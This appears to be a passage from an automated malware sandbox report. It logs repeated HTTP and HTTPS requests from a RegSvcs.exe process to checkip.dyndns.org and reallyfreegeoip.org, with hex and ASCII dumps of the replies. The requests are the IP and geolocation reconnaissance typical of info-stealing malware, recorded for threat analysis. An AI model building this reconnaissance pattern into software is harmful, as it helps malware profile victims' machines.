                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Jan 2, 2025 20:19:52.335079908 CET321INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:52 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 358d1be87af0a5f22903f518f6eaa6e9
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          7192.168.2.549758193.122.130.0807276C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          Jan 2, 2025 20:19:52.698997974 CET151OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                          Jan 2, 2025 20:19:53.209826946 CET321INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:53 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 72f846246538123d96cab9834988e4de
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          8192.168.2.549761193.122.130.0807620C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          Jan 2, 2025 20:19:52.986107111 CET127OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Jan 2, 2025 20:19:53.461972952 CET321INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:53 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: ef29c273f63aecd3b87261ea6396d259
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          9192.168.2.549769193.122.130.0807276C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          Jan 2, 2025 20:19:53.823753119 CET151OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                          Jan 2, 2025 20:19:54.375389099 CET321INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:54 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 590fa648f1b03c99c8701acd7bb9110c
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          10192.168.2.549773193.122.130.0807620C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          Jan 2, 2025 20:19:54.103944063 CET151OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                          Jan 2, 2025 20:19:54.599114895 CET321INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:54 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: e149e8219bbdefe0063bac7b8d95a93a
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          11192.168.2.549783193.122.130.0807620C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          Jan 2, 2025 20:19:55.399588108 CET151OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                          Jan 2, 2025 20:19:56.156508923 CET321INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:56 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 85160bf011ee28d3df22d10749debdd5
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          12192.168.2.549796193.122.130.0807620C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          Jan 2, 2025 20:19:56.810107946 CET151OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                          Jan 2, 2025 20:19:57.263945103 CET321INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:57 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 21cba1ba304f78b4ca4453dc7f25c2aa
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          13192.168.2.549802193.122.130.0807620C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          Jan 2, 2025 20:19:57.882436037 CET151OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                          Jan 2, 2025 20:19:58.545856953 CET321INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:58 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: f526cc3d0a1f6366a5c61fbcab4e835b
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                          HTTPS Proxied Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.549725188.114.97.34437276C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-02 19:19:46 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2025-01-02 19:19:46 UTC859INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:46 GMT
                                          Content-Type: text/xml
                                          Content-Length: 362
                                          Connection: close
                                          Age: 1160375
                                          Cache-Control: max-age=31536000
                                          cf-cache-status: HIT
                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n7015NI8%2FTfGQQZdzdCapIK6Oc0JVVp%2FJHg1OiTO%2BVlwn6%2FR9aOC8nCGAHYmm9xkJKzQvE6cfe%2BaMRqIegUyxypJgfvfhmXQFajNcEh9wFMCzNymzTkBeanGcuXdI8kt15b2guvl"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8fbd1a459a740cb4-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1625&rtt_var=634&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1692753&cwnd=245&unsent_bytes=0&cid=8f243d4bdeebc19e&ts=667&x=0"
                                          2025-01-02 19:19:46 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.549728188.114.97.34437276C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-02 19:19:47 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          2025-01-02 19:19:47 UTC855INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:47 GMT
                                          Content-Type: text/xml
                                          Content-Length: 362
                                          Connection: close
                                          Age: 1160376
                                          Cache-Control: max-age=31536000
                                          cf-cache-status: HIT
                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3sKXixcALsXUdLMTWUu8PH7jVFbKpNhx9bZHVuK626xi8VfGK6ppCxESdhi3S%2BEJEkMBvAXzusJGiLFnX2Nmvya2cGK63pfPM5h68KIc86knOTbVuzdALjagIWr%2BdwqkJzQDvp%2F7"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8fbd1a4a4c3bc35f-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1834&min_rtt=1761&rtt_var=713&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1658148&cwnd=177&unsent_bytes=0&cid=70226427c85c8b3d&ts=140&x=0"
                                          2025-01-02 19:19:47 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.549731188.114.97.34437276C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-02 19:19:48 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2025-01-02 19:19:48 UTC855INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:48 GMT
                                          Content-Type: text/xml
                                          Content-Length: 362
                                          Connection: close
                                          Age: 1160378
                                          Cache-Control: max-age=31536000
                                          cf-cache-status: HIT
                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=au10UL1WxPBfE3c7jwETfd1wJacb0Bvz6xPt%2F6mbpxeoq0%2FmdkJIu0KmSMdhq5HkMKBr6g20Bom77VIQeu17L6KDoiBgRfPWWE6MQ%2FF7QwblSok1Sg2y5Zel5JeuATZgYZKt7QYB"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8fbd1a524de5438c-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=2121&min_rtt=2103&rtt_var=825&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1298932&cwnd=245&unsent_bytes=0&cid=76e88e5fe5daafc9&ts=257&x=0"
                                          2025-01-02 19:19:48 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.549733188.114.97.34437276C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-02 19:19:49 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2025-01-02 19:19:50 UTC861INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:50 GMT
                                          Content-Type: text/xml
                                          Content-Length: 362
                                          Connection: close
                                          Age: 1160379
                                          Cache-Control: max-age=31536000
                                          cf-cache-status: HIT
                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cFeEHFsUB8HO0%2B%2BG5WoLAxRyRzgSQpZT0yrilq1%2F7M9aqA5%2FoEQYaJ%2BY17T4SdM%2FV1f0x4tnp7J9tQRopGoeoYjeTdUvzLFZLu48Uz8mTGrZPET3IR7islqadEFwqvDnvzO2PwhC"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8fbd1a599ae82395-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1993&min_rtt=1985&rtt_var=761&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1423695&cwnd=139&unsent_bytes=0&cid=5708d996f42df4d8&ts=154&x=0"
                                          2025-01-02 19:19:50 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          4192.168.2.549737188.114.97.34437620C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-02 19:19:50 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2025-01-02 19:19:50 UTC863INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:50 GMT
                                          Content-Type: text/xml
                                          Content-Length: 362
                                          Connection: close
                                          Age: 1160379
                                          Cache-Control: max-age=31536000
                                          cf-cache-status: HIT
                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Up5l%2BpL9%2FIlUNsBDxxxmRwMcT0GQoloboFbu4C6%2B7spNQd%2B6Un0laUa%2FMLAhWRj9wrZJBfJdihScDv1sPTXJ0%2BlCAJ4Z0u2iCFfbSJFTziESXtoXgLZct0cIcU%2F1mFanPQbhSzmh"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8fbd1a5e99e37cee-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=2035&min_rtt=2035&rtt_var=1017&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4236&recv_bytes=699&delivery_rate=266886&cwnd=176&unsent_bytes=0&cid=bd357924105f57ba&ts=191&x=0"
                                          2025-01-02 19:19:50 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          5192.168.2.549738188.114.97.34437276C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-02 19:19:51 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2025-01-02 19:19:51 UTC860INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:51 GMT
                                          Content-Type: text/xml
                                          Content-Length: 362
                                          Connection: close
                                          Age: 1160380
                                          Cache-Control: max-age=31536000
                                          cf-cache-status: HIT
                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8NZX9t0jD81WwXQWw90GHcERcTP7aU%2F6OURYrMYPfuk89QHzx3VjzLqe1J%2FwktLGzLlFYpIfzAxGJdfoGJrIuVuj1ETH%2Bkel2UrbP6NLmh1Aiy1Gs1dR0hampc%2B13YniTEizX8Y4"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8fbd1a617d0341f2-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=59335&min_rtt=1831&rtt_var=34773&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1594756&cwnd=231&unsent_bytes=0&cid=29c50adf0f82dfb6&ts=159&x=0"
                                          2025-01-02 19:19:51 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
